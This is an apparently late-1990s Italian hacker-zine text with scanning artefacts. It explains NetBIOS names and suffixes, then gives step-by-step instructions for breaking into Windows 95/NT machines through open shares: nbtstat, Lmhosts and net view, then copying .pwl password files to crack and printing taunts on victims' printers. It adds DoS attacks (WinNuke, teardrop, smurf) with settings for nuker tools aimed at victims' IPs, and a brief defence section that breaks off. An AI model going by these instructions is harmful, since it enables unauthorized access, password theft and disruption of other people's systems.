per la rete con hardware specifico, è stato originariamente progettato per 

essere un controller di rete, per reti LAN dell'IBM. Ora il NetBIOS è stato 

esteso per permettere ai programmi, scritti usando l'interfaccia del NetBIOS, 

di operare su di una architettura token-ring. Da allora il NetBIOS è stato 

adottato come uno standard ed ora vengono usate LANs compatibili col NetBIOS. 


Il NetBIOS offre alle applicazioni in rete un set di strumenti per permettere 

a queste ultime la gestione della comunicazione in rete e il trasferimento di 

dati. 

In pratica il NetBIOS permette alle applicazioni di comunicare con la rete. 

Il suo scopo è di isolare le varie applicazioni da qualsiasi tipo di 

dipendenza hardware. Inoltre in questo modo viene risparmiato ai programmatori 
il compito di sviluppare dei controlli di errore della rete, l'addressing e 

il routing a basso livello. 


In questo modo il NetBIOS standarizza l'interfaccia tra le applicazioni 
software e una LAN. In questo modo può essere specificato a quali livelli del 
modello OSI l'applicazione può scrivere, rendendo quest'ultima trasportabile 
ad altre reti. In una NetBIOS LAN, i computers vengono identificati dal 
sistema attraverso il loro nome. Ogni computer sulla rete ha un nome 
permanente che è programmato in diverse vie. Di questi nomi si parlerà 
dettagliatamente nei paragrafi successivi. 


I PC di una NetBIOS LAN comunicano assieme stabilendo una sessione o usando i 
"NetBIOS datagram" oppure metodi "broadcast". Le sessioni permettono di 
inviare una grossa quantità di dati ed anche la detenzione e correzione degli 

errori. La comunicazione è in base one-to-one. I datagrammi e i metodi 

broadcast permettono ad un computer di comunicare con altri computers allo 
stesso momento, ma la grandezza dei messaggi è limitata e non vi è una 

detenzione e correzzione degli errori. Tuttavia, le comunicazioni attraverso 

l'uso dei datagrammi permettono di comunicare senza aver stabilito una 

sessione. 


Tutte le comunicazioni di questi ambienti sono presentate al NetBIOS in un 
formato chiamato NCB (Network Control Blocks). La locazione di questi blocchi 
nella memoria dipende dal programma user. Questi NCB si dividono in campi, 
riservati rispettivamente per l'input e l'output. 


Nel NetBIOS, le connessioni TCP e UDP sono entrambe supportate; supporta sia 
il broadcast e multicasting, e supporta 3 differenti servizi: Naming, Session 
and Datagram. 


Il NetBIOS è un protocollo molto comune, ed usato oggi in questi campi. Il 
NetBIOS è supportato sulle reti Ethernet, TokenRing, e reti di PCs IBM. Nel 
suo insediamento originale, fu definito solamente come un'interfaccia tra le 


applicazioni e l'adattatore di rete. Da allora, ampliando le funzioni dell 
NetBIOS, si è fatto di lui uno strumento molto più funzionale. 


Col NetBIOS sono supportate sia le connessioni TCP sia quelle UDP. Egli 
supporta sia i metodi broadcasts sia il multicasting, oltre a 3 distinti 
servizi: Naming, Session e Datagram. 


NetBIOS NAMES 


I Nomi del NetBIOS sono usati per identificare le risorse su una rete. Le 
applicazioni usano questi nomi per iniziare e terminare una sessione. Si può 
configurare una singola macchina con applicazioni multiple, ogniuna delle 

quali ha un'unico nome. Ogni PC che supporta 

un'applicazione ha anche un nome generale (NetBIOS station name) che l'utente 
ha definito o che il NetBIOS deduce con mezzi interni. 


Il NetBIOS consiste in una striga alfanumerica che può arrivare fino a 16 
caratteri. La combinazione di questi caratteri deve essere unica; prima che 
un computer possa funzionare pienamente su di una rete, questo deve 
registrare il suo nome del NetBIOS. 


Quando un client diviene attivo, questo divulga il suo nome. Un client è 
considerato registrato, quando, dopo aver divulgato il suo nome, qualsiasi 
altro client che gli richieda una connessione non abbia lo stesso nome. Le 
fasi di questo processo si possono sintetizzare così: 


1. Il client invia ad ogni altro computer collegato in rete le sue 
informazioni riguardanti il NetBIOS, in modo che ogni altro client sulla 
rete le riceva. 


2. Se un altro client sulla rete ha il suo nome, questo trasmette il suo 
broadcast per indicare che il nome è già in uso. Il client che cercava di 
registrarsi con un nome già in uso, arresta tutti i tentativi di 
registrazione con quel nome. 


3. Se nessun altro client sulla rete obietta alla registrazione del nome, il 
client finirà il processo di registrazione. 


Ci sono due tipi di nomi nell'ambiente del NetBIOS: Unique (Unico) e Group 
(Gruppo). Un nome "unico" deve essere unico nella rete. Un nome di "gruppo" 
non deve essere unico e tutti i processi che hanno quel nome del gruppo 
appartengono a quel determinato gruppo. 

Ogni nodo NetBIOS ha una tabella di tutti i nomi che in quel momento sono 
presenti suquel nodo. 


La convenzione presa per l'attribuzione del nome al NetBIOS permette un nome 
di 16 caratteri. Microsoft, tuttavia, limita questi nomi a 15 caratteri e usa 
il sedicesimo carattere come un suffisso per il NetBIOS. Un suffisso è usato 


dal software Microsotf, che lavora in rete, per indentificare le funzionalità 
installate, o servizi o unità registrate. 


Qui sotto vi è una tabella dei suffissi del NetBIOS, attualmente usati da 
WindowsNT. Questi suffissi sono mostrati nel formato esadecimale. 


Workstation Service 
Messenger Service 

Master Browser 

Messenger Service 

RAS Server Service 

NetDDE Service 

File Server Service 

RAS Client Service 

Exchange Interchange 
Exchange Store 

Exchange Directory 

Modem Sharing Server Service 
Modem Sharing Client Service 
SMS Client Remote Control 
SMS Admin Remote Control Tool 
SMS Client Remote Chat 

SMS Client Remote Transfer 
DEC Pathworks TCPIP Service 
DEC Pathworks TCPIP Service 


<computername> 00 
<computername> 01 
<\\ MSBROWSE_ > 01 
<computername> 03 
<computername> 06 
<computername> 1F 
<computername> 20 
<computername> 21 
<computername> 22 
<computername> 23 
<computername> 24 
<computername> 30 
<computername> 31 
<computername> 43 
<computername> 44 
<computername> 45 
<computername> 46 
<computername> 4C 
<computername> 52 


cei a Ge GE e 


<computername> 87 Exchange MTA 
<computername> 6A Exchange IMC 
<computername> BE Network Monitor Agent 
<computername> BE Network Monitor Apps 


<username> 03 U Messenger Service 

<domain> 00 G Domain Name 

<domain> 1B U Domain Master Browser 

<domain> 1C G Domain Controllers 

<domain> 1D U Master Browser 

<domain> 1E G Browser Service Elections 
<INet-Services> 1C Internet Information Server 


Internet Information Server 
Lotus Notes Server 

Lotus Notes 

Lotus Notes 

DCA Irmalan Gateway Service 


<IS-Computer_name> 00 
<computername> [2B] 
IRISMULTICAST  [2F] 
IRISNAMESERVER [33] 
Forte $ND800ZA [20] 


COOGCCOQ 


Unique (U): Il nome puo avere assegnato un solo indirizzo IP. 


Group (G): Un gruppo normale; il nome singolo puo esistere con molti 


indirizzi IP. 


Multihomed (M): Il nome è unico, ma a causa di più interfacce di rete sullo 
stesso computer, la configurazione è necessaria per permettere 
la registrazione. Il numero massimo di indirizzi è 25. 


Internet Group (I): Questa è una speciale configurazione del nome del gruppo, 
usata per amministrare i nomi di domini in WinNT. 


Domain Name (D): Nuovo in NT 4.0 


HACKING COL NETBIOS 


Sottotitolo: 


COME INTROMETTERSI IN SISTEMI 95 O NT via tcp/ip, SFRUTTANDO IL COMANDO 
NBISTAT DI WINDOWS 95. 


Finita la teoria (si fa per dire, perchè continuerà ancora per un po') si 
passa alla pratica, ovvero come utilizzare tutto ciò che abbiamo letto per 
entrare in un sistema collegato in rete. 


Affinchè tutto funzioni bisogna avere tra i nostri componenti della rete il 

CLIENT PER RETI MICROSOFT e tra le impostazioni di quest'ultimo bisogna 
abilitare la "CONNESSIONE RAPIDA". Nella Connessione al provider dobbiamo 
anche attivare la casella di "Accedi alla rete". Inoltre dovete anche avere 

il file vnbt.386 ; se vi manca questo file, (ad esempio a di winnuke 00B) che 
controlla il netbios, non funge niente e devi provvedere !!! 


Fatto questo occorre fare un paio di precisazioni: innanzitutto occorre che i 
PC nei quali vogliamo entrare, abbiano il NETBIOS attivo sul protocollo 
TCP/IP. 

Per sapere ciò occorre utilizzare un programma di Ms-Dos che si chiama 
NBTSTAT. Ecco qui di seguito i sui parametri, anche se noi (in questo caso) 
ci limiteremo a vedere il parametro -A : 


NBISTAT 


Display protocol statistics and current TCP/IP connections usins NBT (NetBIOS 
over TCP/IP). 


NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-s] [-S] 


[interval] 


-a (adapter status) Lists the remote machine's name table given its name 
-A (Adapter status) Lists the remote machine's name table given its IP address 


-c (chace) Lists the remote name chace including the IP addresses 
-n (names) Lists local NetBIOS names 

-r (resolved) Lists names resolved by broadcast and via WINS 

-R (Reload) Purge and reloads the remote cache name table 


-S (Sessions) Lists sessions table with the destination IP addresses 
-s (sessions) Lists sessions table converting destination IP addresses 
to host name via the hosts file 


interval Redisplays selected statistics, pausing interval seconds 
between each display. 


Come detto sopra a noi interessa vedere se un determinato client ha installato 
il NetBIOS, per cui utilizzeremo il comando: 


NBISTAT -A xxx.xxx.XXX.XXX 


(-A maiuscolo; xxx.xxx.xxx.xxx = numero IP della macchina su cui vogliamo 
verificare se il NetBIOS è attivo) 


Ora abbiamo due possibilità: 

A) NETBIOS non è attivo sulla macchina remota e quindi non è possibile 
entrarci In questo caso l'output del comando NETSTAT -A xxx.xXxX.XXX.XXX 
sarà: 

Host not found 


B) NETBIOS è attivo e allora possiamo andare avanti. In questo caso l'output 
sarà qualcosa del genere: 


Name Type Status 
SERVER <00> UNIQUE Registered 
MEDIA SPAZIO <00> GROUP Registered 
SERVER <03> UNIQUE Registered 
SERVER <20> UNIQUE Registered 
MEDIA SPAZIO <1E> GROUP Registered 


(La spiegazione di come leggere la tabella è già stata spiegata, ma in ogni 
caso, a noi serve solamente vedere il primo nome che ci compare) 

Se abbiamo trovato una macchina con il netbios attivo andiamo nella nostra 
directory \windows (o se avete installato windows in un'altra directory....in 


quella dove è installato) e cerchiamo il file Lmhosts. 


Se non è presente lo creeremo con il notepad. Ricordatevi di togliere 


l'eventuale estensione .txt quando lo salverete.... 


Attenzione: solitamente è presente un file chiamato Lmhosts.sam; è un esempio 
di come si fà il file Lmhosts... ma non ce ne fotte nulla. 


Editiamo quindi il file Lmhosts in questo modo: 

XXX.XXX.XXX.XXxX <tab> Nome della macchina <tab> #PRE 

Il nome della macchina è il primo che troviamo con il comando 

NETSTAT -A xxx.xxx.XXxX.XXx; nel caso portato ad esempio è SERVER. Mettiamo 
che l'ip della macchina di cui sopra sia 194.210.123.11, scriveremo: 

194.210.123.11 SERVER #PRE 


usate la tabulazione per staccare le tre parti. 


Salvate nella directory di windows e ricordatevi di togliere l'eventuale 
estensione .txt (praticamente il nome del file dovrà essere solamente Lmhosts) 


Ora dobbiamo tornare in Ms-Dos (naturalmente utilizzate il prompt di Windoze) 
e utilizzare un'altra opzione del comando NBTSTAT. Il parametro in questione 
è -R (Reload) e serve per vuotare (prima) e rileggere (dopo) la cache remota 

per al tabella dei nomi. Quindi: 


NBISTAT -R 


Digitato questo dovremmo ricevere un messaggio di conferma: 
Successful purge and preload of the NBT Remote Cache Name Table 


altrimenti se qualcosa non è andato bene riceveremo un errore (probabilmente 
avete sbagliato qualcosa nello scrivere) 

Arrivati a questo punto dobbiamo sperare che il PC abbia delle risorse 
condivise: Dischi... Stampanti... 

Per vedere se un computer condivide delle risorse in rete, questa volta 
dobbiamo utilizzare un'altra utility di Dos che è net view ... 


Net View 


Visualizza l'elenco dei computer di un gruppo di lavoro specifico o le risorse 
condivise disponibili su un computer specifico. 


NET VIEW |[\\computer] [/YES] 
NET VIEW [[WORKGROUP:nomegl]] [/YES] 


computer Specifica il nome del computer del quale si desidera che vengano 
visualizzate le risorse condivise. 


/[WORKGROUP. Specifica che si desidera avere visualizzati i nomi dei computer 
che condividono risorse in un altro gruppo di lavoro. 

nomegl Specifica il nome del gruppo di lavoro del quale si desidera 
avere visualizzati i nomi del computer. 

YES Esegue il comando NET VIEW senza richiedere di fornire 
informazioni o di confermare operazioni. 


Per visualizzare un elenco dei computer del proprio gruppo di lavoro che 
condividono risorse, digitare NET VIEW senza le opzioni. 


Tornando a noi, dovremo digitare: 
net view \\Nome della macchina 


(nel nostro esempio: net view \\SERVER) 


Se il computer condivide qualcosa avremo l'elenco delle risorse condivise... 
una cosa del genere: 


Condivisione Tipo Commento 


COLORI Stampa 
DISCO SERVER Disco 
RICOH-LASER Stampa 
Esecuzione comando riuscita. 


Se non condivide nulla possiamo anche cambiare obiettivo... :((( 


La macchina in questione condivide due stampanti ed un disco. 


Per condividere il disco andiamo in Risorse del Computer.... e clicchiamo 
sulla barra degli strumenti (se non l'avete ancora attivata... che 
aspettate?!?!) sull'icona "Connetti unità di rete"; apparirà una finestra con 
UNITA' e PERCORSO. 


Lasciamo l'unità a quella che è, e digitiamo nel percorso cio' che segue: 
\\Nome della macchina\nome condivisione 


Quindi nel nostro caso \\SERVER\DISCO SERVER (sempre rispettando maiuscole e 
minuscole) 


A questo punto verrà creata un'icona con la condivisione e cliccandoci sopra 
entreremo nel disco del computer remoto. Potremo sfogliarlo, copiare e nel 
caso non sia Read-only scriverci! (Complimenti... ce l'avete fatta!) 


E' anche possibile condividere una stampante. 
Per fare cio' andiamo nella cartella stampanti, clicchiamo aggiungi stampante, 


scegliamo STAMPANTE DI RETE, digitiamo il percorso della stampante... ad 

esempio nel nostro caso potrebbe essere \\SERVER\COLORI o \\SERVER\RICHO-LASER 
scegliamo di non stampare la pagina di prova (per non rovinare l'effetto 

sorpresa) e confermiamo il tutto. 


A questo punto il PC scaricherà i drivers direttamente dal PC REMOTO... 
potrebbero volerci una decina di minuti, e il pc sembrerà bloccato, ma non lo 
è; attendete pazientemente e quando avrà finito potrete scrivere un bel file 
con il msg: 


HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 


o quello che volete e stamparlo sulla stampante remota... immaginate la 
sorpresa !!! 


Naturalmente questa non è l'unica cosa che potete fare! Se volete potete 
andare nella cartella windows e copiarvi sul vostro hard-disk i files 
System.ini e tutti i file con estensione .pwl (Password List), ovvero i filez 
che contengono tutte le passwords salvate. In questo modo con un crack per 
file pwl potete grabbare ai coglioni tutte le loro passwords! 


Anche questo è un semplice esempio, ora sta a voi inventare cosa fare... mi 
raccomando fate attenzione! I fottutissimi Logs sono sempre in agguato! 


ERRORI 


È probabile che, se non avete impostato tutto bene, vi dia qualche errore... 
ecco qui la spiegazione di quelli più frequenti: 


- Errori che si verificano col comando: NET VIEW \\NOMEPC 


I7B7 AHAHA AAA RAFA EA 
"Errore 3787: accedere prima di eseguire l'operazione" 


Se con il comando net di win95 vi appare questo errore, vuol dire che nelle 
impostazioni della vostra connesione non è stato selezionato: "Accedi alla 
rete" o "Log into network" per chi ha la versione americana. Una volta 
selezionato, quell'errore non apparirà piu', però noterete dei rallentamenti 
nella fase di connessione! 


Nielezzizisisnaie prsrssra scia sie rate prdrssressia sisi sie prsicsresdiarsiersib steps rtieicitrnti 
Errore 53: mpossibile individuare il nome computer specificato nel percorso 
di rete. Verificare che il nome sia corretto o riprovare in un secondo tempo, 


quando il computer remoto sarà disponibile. 


Normalmente si verifica se il PC remoto ha il servizio di condivisione 
attivo ma non condivide niente. 


- Errori che si verificano con il comando: nbtstat -A 


DREI HARA 
"Errore 51: Richieste non ricevute dal computer specificato. Verificare il 
nome del computer o riprovare in un secondo tempo quando sarà disponibile." 


sembra - ma non ho verificato - che si ottenga se dando il 
nbtstat -A xxx.xxx.xXx.xXx non si ottiene un riga tipo 
NST <1E> GROUP Registered 


CONSIDERAZIONI FINALI 


Lo so che è difficile che le condizioni affichè cio' funzioni si verifichino 
tutte insieme... ma vi assicuro (esperienza personale) che in un'ora di lavoro 
riuscite a trovare 4 o 5 server (o client) che presentano questa falla. 


Ultimamente ho provato anche a studiare un programmino che faccia tutto questo 
da solo, tipo uno scanner, che buchi anche il remoto. Purtroppo (non so il 
perchè) non funzia sempre, per cui vi consiglio di avere pazienza e (per ora) 

di utilizzare un po' di buona volontà! 


Il risultato è garantito. 


GUIDA AGLI ERRORI CON NET VIEW 
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Presentano: 


documentazione deegli errori che siamo riusciti a spiegare ,-) 
By Bacco 


Questo documento sciega gli errori più comuni che si verificano 


quando si cerca di fare un 
NET VIEW \\NOMEPC 


I7B7 AAA AHAHA AAA AAA EA 
"Errore 3787: accedere prima di eseguire l'operazione" 


Se con il comando net di win95 vi appare questo errore, vuol dire che nelle 
impostazioni della vostra connesione non è stato selezionato: "Accedi alla 
rete" o "Log into network" per ki ha la versione americana. 

Una volta selezionato, quell'errore non apparirà piu', però noterete dei 
rallentamenti nella fase di connessione!!! 


a me è successo anche quando pur avendo installato nel sistema la scheda di 
rete questa non era fisicamente presente, quindi il servizio di rete 
era automaticamente disabilitato dal plug&PRAY di w95 ;-( 


la prova per risolvere il problema è di verificare che con la 
connessione Dial-Up vs. il provider attiva (se no w95 non assegna 
l'indirizzo alla scheda RAS) facendo un 

net view \\SeStessi 

non si ottenga l'errore, altrimenti è la prima cosa da risolvere prima 
di procedere 


03 RARA RARA 

Errore 53: mpossibile individuare il nome computer specificato nel percorso 
di rete. Verificare che il nome sia corretto o riprovare in un secondo tempo, 
quando il computer remoto sarà disponibile. 


Normalmente si verifica se il PC remoto ha il servizio di condivisione 
attivo ma non condivide niente. 


DU AIIP IARIE PIERO HI ILIIRIEDILI A IEI ERA LIE HILL EIRA ARI IALI CR IR ARIDI 
"Errore 51: Richieste non ricevute dal computer specificato. Verificare 
il nome del computer o riprovare in un secondo tempo quando sarà 
disponibile." 


sembra - ma non ho verificato - che si ottenga se 
dando il nbtstat -A xxx.xxx.xxx.xxx non si ottiene un riga tipo 
NST <1E> GROUP Registered 


tutto da verificare, chi lo fa ...me lo comunichi, grazie ;-) 
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CONOSCERE GLI ATTACCHI DOS 


Su IRC può capitare spesso di disconnettersi dal server, che cada la linea, o si blocchi il 
computer. Solitamente non ci facciamo più di tanto caso, ma spesso il motivo del contrattempo è 
dato da qualcuno, che con qualche programma ha fatto si che ciò accadesse.. 

Questo tipo di attacchi è detto DoS, (Denial of Service = Privazione di Servizio) termine che 


racchiude in se tutti i tipi di attacchi che non hanno lo scopo di penetrare in un sistema, ma 
solo di causare rallentamenti, disconnessioni, o crash al fine di privare di un determinato 
servizio un certo computer connesso alla rete. 

I DoS più comuni si dividono in: "Attacchi Bug" e "Attacchi Flood" 


ATTACCHI BUG 

Come certamente saprete, nessun sistema operativo (specialmente Windows) è perfetto, ed è 
possibile mandarlo in crash, o comunque creargli dei problemi, semplicemente crando una 
situazione che l'OS non sa gestire... 

Perciò sono stati utilizzati alcuni sistemi, per attaccare gli OS tramite le rete. 

Purtroppo (o fortunatamente) alcuni di dei seguenti attacchi non sono più utilizzati, perchè a 
causa degli aggiornamenti dei software molti di essi non sono più efficaci.. 

Ma adesso vediamoli nel dettaglio: 


O00B 

Detto anche WinNuke (dal nome del famosissimo programma che lo genera), l'OOB (Out Of Band) 
è 

un'attacco che consiste nell'invio di una stringa non valida alla porta 139 (netbios), e la 

macchina non sapendo interpretare il comando va in crash. 

I sintomi sono BlueScreen, o congelamento. 

L'attacco può essere generato da qualsiasi tipo di macchina, ma è efficace solo contro Win95/NT 
con le Winsock di versione inferiore alla 2.2. 

Il più famoso programma per utilizzare questo attacco è WinNuke, ma consiglio anche vOOB. 

Per Windows NT la porta di default è la 137. 


Bonk 

Un'attacco che ha come sintomo il BlueScreen, e che funziona solo su Win95/NT con le WinSock 
non 

aggiornate. 

Può essere generato solo da macchine *nix, anche se con il programma Exploit Generator è 
possibile utilizzarlo anche da Windows. 


Land 

Invia un pacchetto con gli stessi indirizzi di sorgente e destinazione ad una porta causando il 
blocco del sistema. 

Il land ha come sintomo il blocco completo del PC. 

Ha effetto solo su Win95/NT con le WinSock non aggiornate, e può essere generato solo da 
macchine *nix, anche se con il programma Exploit Generator è possibile utilizzarlo anche da 
Windows. 


Teardrop 

Invia un pacchetto IP frammentato in modo non corretto. Lo stack TCP/IP va in crash tentando di 
riassemblarlo. 

Il teardrop ha come sintomi il blocco/riavvio immediato del sistema. 

E' efficace su Win95/NT e Linux precedenti a 2.0.32 o 2.1.63. 

Per Windows 95, potrebbe essere inutile anche aggiornare le WinSock a causa delle sue molteplici 
varianti. 


Può essere generato solo da macchine *nix, anche se con il programma Exploit Generator è 
possibile utilizzarlo anche da Windows. 


Bloop 
Detto anche "Flushot", è un'attacco che può essere generato solo da macchine *nix, e che causa 
il blocco del sistema su Win95/98/NT. 


ICMP Nuke 

Detto anche "Click", colpisce il protocollo tcp del server IRC e del client connesso; Questi 
attacca entrambe le porte sulle quali comunicano il client e il server causando la chiusura 
immediata della connessione. 

Sono affetti da ICMP Nuke tutti i sistemi Windows, e può essere generato da una qualsiasi 
macchina. 

Non tutti sanno che questo attacco può essere inviato non solo contro le connessioni IRC, ma 
anche contro qualsiasi connessione TCP (i msg di errore del browser per esempio "la connessione 
è stata reimpostata"). 

Il programma più famoso per generare questo attacco è senza dubbio Click2.2. 


Ping Pattern 

Consiste nell'inviare al modem della vittima attraverso PING o anche CTCP il comando +++ATH0 
(disconnessione). Il modem alla risposta si disconnette immediatamente. 

Sono affetti tutti i sistemi operativi con modem non US ROBOTICS (50%). 

Un firewall ben impostato risolve il problema o anche basta impostare ATS2=255 fra le 
inizializzazioni: 

Avvio -> Impostazioni -> Pannello di controllo -> Modem -> Proprietà modem -> Connessione -> 
Avanzate -> Altre impostazioni : inserire ATS2=255 

Il miglior programma per lanciare questo attacco è il Rocket V1.0. 


SSPing - Ping of Death 

Il Ping of Death (detto anche ssping) è un attacco provocato dall'invio di uno o più 

messaggi richiesta echo ICMP di dimensioni maggiori a 64 KB. Windows non è configurato per 
ricevere pacchetti di tali dimensioni, e va in crash. 

Gli effetti variano da macchina a macchina ed è un'attacco che ha efficacia su tutti i sistemi 
Windows. 

Può essere generato da una macchina qualsiasi, e per difendersi è possibile aggiornare il 

proprio OS con una pach. 


ATTACCHI FLOOD 

E' possibile creare rallentamenti, o disconnessione, anche inviando enormi quantità di dati. 
L'efficacia di questi attacchi è data anche dalla differenza di velocità di connessione tra 
vittima e attaccante. 

Vediamoli meglio: 


ICMP Flood 

Avviene di solito mediante l'invio di molti ping. Il flood si verifica quando un utente invia 
una enorme serie di ping che attaccano direttamente il winsock. Praticamente il modem viene 
sovraccaricato di pacchetti ping inutili e questo comporta un notevole rallentamento della 
connessione. Il computer attaccato quindi passerà tutto il tempo a rispondere ai ping dell' 


aggressore e verranno bloccate tutte le altre connessioni. 

Sono affetti tutti i sistemi operativi, e può essere generato da una macchina qualsiasi 

Di programmi per utilizzare questo attacco ce ne sono veramente tantissimi, e uno di questi è 
Battle Pong. 


SYN Attack 

Il suo uso principale è bloccare servizi come Telnet o FTP. In pratica un SYN flood stabilisce 
molte connessioni ad un'unica porta TCP di un host remoto. Stabilita una connessione (tramite 
l'invio di un messaggio SYN), la vittima si aspetta un messaggio "ack", che l'attaccante si 
guarderà bene dal mandargli. 

Così l'attaccante chiude la connessione, ma la vittima continuerà ad aspettare il messaggio 

ack per un certo periodo di tempo. Ne viene aperta un'altra, e il processo si ripete, facendo si 
che la vittima abbia tantissime connessioni aperte, e l'attaccante solo una. 

In questo modo è facile che il programma monitor vada in crash con il pericolo di un crash di 
sistema. 

Sono affetti tutti i sistemi operativi, e può essere generato da una macchina qualsiasi. 

La soluzione è evitare in ogni modo di tenere anche solo per monitoraggio porte aperte. 

Un programma per generare questo tipo di attacco è SYN Flooder, ma funziona solo con Windows 
2K. 


IGMP Attack 

L'attaccante invia alla vittima decine di pacchetti IGMP, Windows non riuscendo a gestire 
questo protocollo rallenta la connessione. Certe volte può dare anche BlueScreen. 

E' un'attacco che può essere generato da qualsiasi macchina, e che ha effetti su Win95/98/NT. 
Esistono delle pach che riducono l'offensività di questo attacco, ma non rendono immuni da un 
flood di questi pacchetti. 

Un programma che invia questo attacco è Doom IGMP Nuke. 


Smurf 

L'attacante invia a degli IP Broadcast (i quali smistano il pacchetto ad una parte di rete, che 
può essere anche molto grande) dei pacchetti ICMP Echo Request, con l'IP della vittima. 
Questa perciò viene sommersa dalle risposte (ICMP Echo Reply) di molti PC. 

Il sintomo è la disconnessione, o rallentamento. 

Può essere generato solo da macchine *nix, anche se Explorer Generator riesce a utilizzare 
questo tipo di attacco (anche se con risultati molto minori). 

Sono affetti tutti i sistem operativi. 
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2.Configurare un nuker 


Dopo aver visto come funzionano i più comuni attacchi DoS, vediamo anche come utilizzarli. 
Tutte le impostazioni sono relative ad un modem 56K. 


CLICK 2.2 


Il Click è il programma più usato dai dillettanti su IRC, ma può essere utile per disconnettere 
dal server qualcuno che ha una connessione più veloce della nostra. 

Questo programma usa l'attacco chiamato Nuke ICMP, e per farlo attacca tutte le porte client e 
server più comunemente utilizzate nel campo IRC, fino trovare l'accoppiata giusta. 

Vediamo come configurarlo: 


- Selezionare l'opzione "Client" 

- Error: Protocol Unreachable 

- Server: inserire il server IRC della vittima 

- Porte Server: start=6660 stop=6669 

- Client: inserire l'IP della vittima 

- Porte Client: start=1024 stop=1800 (ma per alcuni utenti può essere necessario inserire 4000) 
- Send 75 packets 

- Every 1000 ms (se non vi disconnettete provate 500) 

- Clickare su "NUKE" 

- Enjoy yourself 


DOOM IGMP NUKE 

Invia pacchetti IGMP, e Windows cade, perchè non riesce a gestire questo protocollo. 

Secondo me è il miglior nuker per Windows98: funziona nel 90% dei casi, anche perchè la maggior 
parte firewall non filtrano questo tipo di attacco. 

Vediamo come configurarlo: 


- Target IP: inserire l'Ip della vittima 

- Size: 15000 (meglio 30000) 

- Times: 30 (per alcuni utenti particolarmente resistemti ppuò essere neccessario arrivare a 100) 
- Clickare su "NUKE!" 

- Enjoy yourself 


ROCKET 

Invia la stringa si disconnessione "+++ATHO" 

Prima di utilizzare qualsiasi altro attacco lo provo sempre: funziona istantaneamente, e da 
risultati abbastanza verosimili, putroppo il 50% dei modem non ne sono affetti... 
Vediamo come configurarlo: 


- Target IP:Inserire l'IP della vittima 
- Data: +++ATHO 

- times: 5 

- time out: 3000 

- Clickare su "SEND PACKET" 

- Enjoy yourself 


I messaggi che vengono visualizzati dopo aver nukkato possono essere molto utili per conoscere 
l'esito dell'attacco: 

- "Possible target is hit by Rocket.": il modem della vittima è stato disconnesso (ATTENZIONE: 
questo messaggio viene visualizato anche nel caso che la vittima stia usando un firewall). 

- "Possible target is not vulnerable.": la vittima non può essere disconnessa con questo tipo di 
attacco. 

- "Operation completed.": il modem della vittima potrebbe essere stato disconnesso, ma non se ne 


può avere la certezza. 


ICMP Flooder 

Nel configurare questo tipo di nukes non mi riferisco ad uno in particolare, perchè ce ne 

sono veramente moltissimi, e generalmente sono molto simili tra di loro. 

Apparte l'IP del malcapitato, consiglio di fare molte prove, cercando di impostare la grandezza 
dei pacchetti maggiore possibile, e l'intervallo minore possibile. 

Tuttavia dovete stare attenti a non esagerare troppo, altrimenti potreste rallentare troppo la 
vostra connessione. 


Nukes 0OB 

Ricordatevi che questo attacco funziona solo contro Win95/NT con winsock non aggiornate. 
Spiego il funzionamento dei nuker di questo tipo, senza riferirmi ad uno in particolare perchè 
ne esistono tantissimi si assomigliano molto tra loro: 


- Messaggio: Una qualsiasi frase o parola. 

- Host o IP: inserire l'IP della vittima 

- Porta: 139 (137 per WinNT) 

- Times (o "Numero", o "Volte"): 3 o 4 possono bastare 
- Enjoy yourself 


NB: molti di questi nuke sono in Inglese, ma con la spiegazione che vi ho fornito dovreste 
ugualmente intuire come si utilizzano 


Smurf 

L'unico programma che genera realmente attacchi smurf (benchè di modeste dimensioni) sotto 
Windows è Exploit Generator. 

Come sapete, per fare un'attacco smurf dobbiamo essere a conoscenza di molti PC Broadcast. 
Per trovarli potete usare un programma come Ultimate Broadcast Scan (UBS). 

Vediamo come settarlo: 


- Start broadcast address: inserire i campi del range di Ip da scannare 

- Time after the end...statistics: 3000 ms 

- Sort broadcasts more than 5 addresses 

- Nel riquadro in basso a destra verranno visualizzati gli IP dei broadcasts trovati, quindi 
salvarli su un file tipo "BroadcastList.txt". 


Ma adesso vediamo come settare Exploit Generator per un'attacco smurf: 

Dopo la schermata di avvio cliccare sul pulsante in basso "Simple mode" (volendo potete farlo 
anche dal "Packet Builder", ma in quel caso non avreste bisogno di questa guida..). 

A questo punto modificare solo le opzioni elencate: 


- Destination IP: inserire l'IP della vittima 
- Source IP: un qualsiasi IP che non sia il vostro (meglio se è quello della vittima stessa) 
- Delay: Il minimo che riuscite a sostenere 


- # of packets: provare 50, ma dipende da quanto e per quanto tempo volete rallentare la vittima 
- Anti Back fire impostarlo a seconda della velocità della vostra connessione, comunque sarebbe 
bene fare delle prove. 

- Adesso cliccare sul pulsantino "BC": apparirà una schremata: clickare su "load" e caricare il 
file in cui avete salvato gli IP Broadcast. 

- Premere il tasto "Smurf". 

- Enjoy yourself!! 
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3.Difesa 


Come dico sempre io "prima di incominciare a diconnettere la gente bisogna proteggersi, 
altrimenti prima o poi trovi qualcuno che ti riavvia il PC". 

In realtà il pericolo maggiore non è questo (anche perchè se uno ci sa fare te lo riavvia 
ugualmente), il fatto è che qulacuno potrebbe risentisrsi dei pacchetti che tu gli hai inviato, 
e disconnettere te, oppure nel caso che tu abbia un troian installato, che ti entri dentro il PC 
(ma questa è un'altra storia). 


Vediamo come difendersi con i vari sistemi operativi: 


WINDOWS 95/NT 


Aggiornare le winsock alla versione 2.2 difende dai seguenti attacchi: 
O00B 

Land 

Bonk 

e in molti casi anche dal Teadroop 


Utilizzare uno o più firewall difende dai seguenti attacchi: 
O00B 

Land 

Bonk 

Teardrop 

ICMP Nuke 

Ping Patern 

Icmp Flood 

Solamente in certi casi SSPing 


Per gli ssping, e gli IGMP nuke è necessario installare una pach apposita. 
I pacchetti IGMP possono essere utilizzati ugualmente per normali attacchi flood, e non mi è 
possibile esserne immune, perchè non ho trovato firewall che filtrano questo tipo di pacchetti. 


Per il SYN Flood bisogna evitare di tenere aperte porte, anche solo per monitoraggio (cosa 
praticamente impossibile). 


Per il Bloop non ho notizie certe, ma probabilmente con un firewall si ovvia al problema. 


Se non ne siete immuni per difendersi dal Ping Patter è sufficente inserire: 
